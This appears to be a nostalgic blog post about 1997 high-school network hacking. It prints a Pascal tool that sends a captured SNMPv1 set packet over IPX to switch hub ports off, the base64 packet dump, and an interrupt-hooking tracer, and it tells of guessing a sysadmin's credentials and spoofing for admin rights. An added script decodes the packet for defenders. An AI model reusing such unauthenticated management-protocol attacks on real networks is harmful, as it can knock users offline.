Retro: Highschool reversing (’97)

I’ve stumbled upon a lot of interesting stuff this weekend … nothing special, just some emotional retro stuff.

This piece of code got me a 2-month ban from the high school’s PC lab :-). The interesting thing about it is that it is 14 years old, and it is written in the first language I ever learned: Pascal. (Currently I have no idea what {$i+} or {$i-} mean.)

OK, what is this? This tool could turn the ports of the SMC switches/hubs used by our high school on or off.

How did we (me and a friend of mine) create it? It was a long way. At that time we were “Operators” in the PC lab, with a few responsibilities and no rights at all. Yeah, we wanted some power. We could freeze the server (Novell 3.11), but that was not fine-grained enough. We had a backdoor in a fancy “login-screen” app, but not everyone ran it. And one day we found a guy from the sysadmin team with an interesting login name. It was so strange that it was easy to guess that he had used his password as his login name and his user name as his password. Using his account we collected a lot of tools, which we started to “reverse engineer”.

At that time the students had no internet connection, just e-mail. That was also useful, because we gathered some documentation and other programming stuff using gopher servers and a remote shell server (our first GNU/Linux server, in another school with a full internet connection), which accepted commands by mail and replied with the results. We had Turbo Pascal and Turbo Assembler, and we dreamed about “Watcom C”, and of course GNU/Linux too (we had access to one machine running Linux, only 1 hour per week). We had a book about the x86 hardware, and another called “Undocumented DOS interrupts”.

Unfortunately we had no debugger. Our idea was to hook interrupt 0x21 with a new handler (also written in Pascal) which prints out the register contents and waits for a keypress before continuing execution in the old interrupt handler. This was a hard task, because we could hook any of the other interrupts except 0x21: the standard method did not work with 0x21. An extra “recovery” code was needed. That was the hardest part of the task.

But after a long time, we finished our tracer tool. It was a real eye-opener. We could “trace” all the applications we had access to. We also used this tool to redirect file operations, dump network traffic, etc. It was really fun. After a month of one-to-two-hour evening development sessions, we had it: a tool to kick someone off the net. [We never used it in a wrong way …]

Why did we get banned? After we had it, we needed to map the PCs in the lab to the port numbers of the switch. Unfortunately we accidentally switched off the inbound port, the one our own connection came through. There was no way back. We needed physical access to move the incoming cable to another port on the switch, but nobody trusted us. I really don’t know why, because this was way before we got superuser privileges on the server using IPX spoofing :-). So they waited for the sysadmin, who was on holiday, to fix the problem. Result: the net was down for 10 days.

Lesson of the story: if we had never tried to fix the situation, nobody would have found out that it was caused by us :-).

And here is the tool, aka network programming in Pascal:

program kill;

uses crt,ipxunit,dos;

const
    send_socket = $0A95;
    receive_socket = $0f90;
    e_message : array[1..4] of string = (
        'Kill.ipx not found!',
        'Ipx/Spx driver not found',
        'Socket error',
        'Parameter error !'#13#10' Use : [hub_number] [node_number] [command 01=OFF 02=ON]');

type data=record
    h:ipxheader;
    length:word;
    d:array[1..1024]of byte;
end;

procedure error(en:byte);
begin
    writeln('Error message #',en:3,' : ', e_message[en]);
    halt(en);
end;

var
    e:ECB;
    f:file of data;
    d:data;
    hub_number,node_number,command:byte;
    h1,h2,h3:word;

begin
    writeln;
    writeln('IPX/SPX HUB config 1997 copyright Polemos Soft Company');
    writeln('Version: 1.7 ');
    writeln;

    {PARAMETER}
    val(paramstr(1),hub_number,h1);
    val(paramstr(2),node_number,h2);
    val(paramstr(3),command,h3);
    if (paramcount <> 3)or(h1<>0)or(h2<>0)or(h3<>0) then error(04);

    {FILE}
    assign(f,'kill.ipx');
    {$i-}
    reset(f);
    read(f,d);
    close(f);
    if ioresult<>0 then error(01);
    {$i+}

    {IPX}
    if not IPXinstalled then error(02);
    IpxCloseSocket(send_socket);
    if IPXOpenSocket(send_socket) <> 0 then error(03);

    {ECB}
    ZeroEcb(e);
    with e do begin
        socket_number := send_socket;
        fragment_count := 2;
        fragment[0].address := @(d.h);
        fragment[0].length  := sizeof(IPXHEADER);
        fragment[1].address := @(d.d);
        fragment[1].length  :=d.length;
        immediate_address:=d.h.dest_network_node;
    end;

    {SETTINGS}
    d.h.dest_network_socket:=receive_socket;
    d.d[44]:=hub_number;
    d.d[45]:=node_number;
    case command of
        1:d.d[48]:=01;
        2:d.d[48]:=02;
    end;

    ipxsendpacket(e);
    ipxclosesocket(send_socket);
end.

The dumped packet (base64 encoded):

//8ATgAEAAq80gCADygNnXd3AAq80gAAwHvgwwqVMAAwLgIBAAQGc21jc2V0oyECAR8CAQACAQAw
FjAUBg8rBgEEAYFKAwEDAQUBAQUCAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
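To make the dump above readable, here is an added analysis script; it is not part of the original post and not the author's code. It takes the first 108 base64 characters of the dump (they decode to the 30-byte IPX header, the Pascal record's 2-byte length word and the whole 48-byte payload; everything after that is zero padding of the 1024-byte buffer), parses the IPX header by the standard field layout, and then walks the payload as BER-encoded SNMPv1 (RFC 1157). All function and key names are mine. What it shows is what a defender watching this segment in 1997 would have seen: a version-1 SNMP SetRequest whose only "authentication" is a cleartext community string, sent to a vendor-private OID (IANA enterprise 202). That property is both what made a tool like this possible and the thing to alert on.

```python
import base64
import struct

# Constructed from the post: the first 108 base64 characters of the dump.
# They decode to the IPX header (30 bytes), the record's length word (2 bytes)
# and the 48-byte payload; the remaining lines of the dump are zero padding.
DUMP_B64 = (
    "//8ATgAEAAq80gCADygNnXd3AAq80gAAwHvgwwqVMAAwLgIBAAQGc21jc2V0oyECAR8CAQACAQAw"
    "FjAUBg8rBgEEAYFKAwEDAQUBAQUCAQEA"
)

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}


def parse_ipx_header(buf):
    """Parse the 30-byte IPX header; every field is big-endian on the wire."""
    checksum, length, transport_control, packet_type = struct.unpack(">HHBB", buf[:6])
    return {
        "checksum": checksum,
        "length": length,                    # header + payload, in bytes
        "transport_control": transport_control,
        "packet_type": packet_type,          # 4 = Packet Exchange Protocol (PEP)
        "dst_net": buf[6:10].hex(),
        "dst_node": buf[10:16].hex(),
        "dst_socket": struct.unpack(">H", buf[16:18])[0],
        "src_net": buf[18:22].hex(),
        "src_node": buf[22:28].hex(),
        "src_socket": struct.unpack(">H", buf[28:30])[0],
    }


def ber_tlv(buf, pos):
    """Decode one BER tag-length-value starting at pos; returns (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def ber_oid(value):
    """Decode an OBJECT IDENTIFIER: first byte packs two sub-ids, the rest are base-128."""
    sub_ids = [value[0] // 40, value[0] % 40]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:                     # high bit clear ends a sub-identifier
            sub_ids.append(acc)
            acc = 0
    return ".".join(map(str, sub_ids))


def parse_snmp_v1(payload):
    """Parse an SNMPv1 message (RFC 1157 layout) into its fields."""
    _, msg, _ = ber_tlv(payload, 0)          # outer SEQUENCE
    _, version, pos = ber_tlv(msg, 0)
    _, community, pos = ber_tlv(msg, pos)
    pdu_tag, pdu, _ = ber_tlv(msg, pos)      # context tag tells the PDU type
    _, request_id, pos = ber_tlv(pdu, 0)
    _, error_status, pos = ber_tlv(pdu, pos)
    _, error_index, pos = ber_tlv(pdu, pos)
    _, vb_list, _ = ber_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vb_list):
        _, vb, pos = ber_tlv(vb_list, pos)
        _, oid, p = ber_tlv(vb, 0)
        vtag, val, _ = ber_tlv(vb, p)
        value = int.from_bytes(val, "big", signed=True) if vtag == 0x02 else val.hex()
        varbinds.append((ber_oid(oid), value))
    return {
        "version": int.from_bytes(version, "big"),   # 0 means SNMPv1
        "community": community.decode("ascii", "replace"),
        "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
        "request_id": int.from_bytes(request_id, "big"),
        "error_status": int.from_bytes(error_status, "big"),
        "varbinds": varbinds,
    }


def analyze_dump(b64=DUMP_B64):
    """Decode the dump and report the fields an analyst would look at."""
    raw = base64.b64decode(b64)
    ipx = parse_ipx_header(raw)
    record_length = struct.unpack("<H", raw[30:32])[0]   # Pascal 'length: word', little-endian
    payload = raw[32:32 + record_length]
    snmp = parse_snmp_v1(payload)
    # A v1/v2c SetRequest carries nothing but a cleartext community string as
    # authorisation, so one on the wire is worth an alert on its own.
    flagged = snmp["pdu"] == "SetRequest" and snmp["version"] in (0, 1)
    return {"ipx": ipx, "record_length": record_length,
            "snmp": snmp, "cleartext_set_request": flagged}


if __name__ == "__main__":
    report = analyze_dump()
    print("IPX  :", report["ipx"])
    print("SNMP :", report["snmp"])
    print("flag :", report["cleartext_set_request"])
```

The IPX length field (78) is exactly the 30-byte header plus the 48 bytes the record's own length word announces, and the source socket in the header is the program's send_socket ($0A95), which confirms the dump is a capture of this very tool. In this decoding the three payload bytes the Pascal program overwrites (d.d[44], d.d[45], d.d[48]) are the last two sub-identifiers of the varbind's OID and its INTEGER value, so the entire "protocol" the hub accepted was an unauthenticated SNMPv1 set; on a managed network the mitigation is the same today as it would have been then: no SNMP sets with default or shared community strings, and a detection rule on SetRequest PDUs from anything but the management station.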

And here is the “tracer” (an early version):

{$M 2048,0,0}
{$F+}

Uses DOS;

Const HEXTABLE : array[1..16] of char = ('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');

Var OldInt21: Pointer;
    Regs : Registers;

Procedure NewInt21; Assembler;
Asm
  { Only DOS functions with AH <= 0B0h are displayed; anything above is passed straight through }
  cmp   ah,0B0h
  jna   @Write
  jmp   @RunOld

@Write:
  { Save every register the display code clobbers }
  push ax
  push bx
  push cx
  push dx
  push es
  push di

  { ES := B800h, the colour text-mode video segment }
  push ax
  mov ax,0b800h
  mov es,ax
  pop ax

  { DI := 160, the first cell of screen row 1 (80 columns * 2 bytes per cell) }
  mov di,160
  push ds
  mov dx,ax            { DX := the AX the caller passed to INT 21h }

  { DS:BX := HEXTABLE so that XLAT can translate a nibble into its hex character }
  mov ax,seg hextable
  mov ds,ax
  mov bx,offset Hextable

  mov ah,15h           { attribute byte for the displayed characters }

  { Emit 4 hex digits, most significant nibble first }
  mov cx,4
@1_NewDos:
  push cx
  mov  cx,4
  xor  al,al
@2_NewDos:
  shl  dx,1            { shift the next nibble of DX into AL, one bit at a time }
  rcl  al,1
  loop @2_NewDos
  xlat                 { AL := HEXTABLE[AL] }
  mov  es:[di],ax      { write character (AL) and attribute (AH) to video memory }
  add  di,2
  pop cx
  loop @1_NewDos

  { Wait for a keypress (BIOS INT 16h, AH=0) before letting the DOS call proceed }
  mov ax,0h
  int 16h

  pop ds
  pop di
  pop es
  pop dx
  pop cx
  pop bx
  pop ax

  jmp   @RunOld

@I21:
  DD      0            { far-pointer slot inside the code segment, filled in below }

@RunOld:
  { Copy OldInt21 into the CS-relative slot, then chain to the original handler }
  push  ds
  push  ax
  mov   ax, SEG @Data
  mov   ds, ax
  mov   ax, WORD PTR OldInt21
  mov   WORD PTR cs:[offset @I21], ax
  mov   ax, WORD PTR OldInt21 +2
  mov   WORD PTR cs:[offset @I21 +2], ax
  pop   ax
  pop   ds
  jmp   DWORD PTR cs:[offset @I21]
End;

Begin
Writeln('Netware Debuger for Dos v1.0!');
Writeln('CopyRight (c) Polemos TM (Polemos Soft Company ''97)');
Writeln('All rights reserved.');

GetIntVec($21,oldint21);     { remember the original INT 21h vector }
SetIntVec($21,@newint21);    { install the hook }
Keep(0);                     { terminate and stay resident }
End.
This entry was posted in Retro.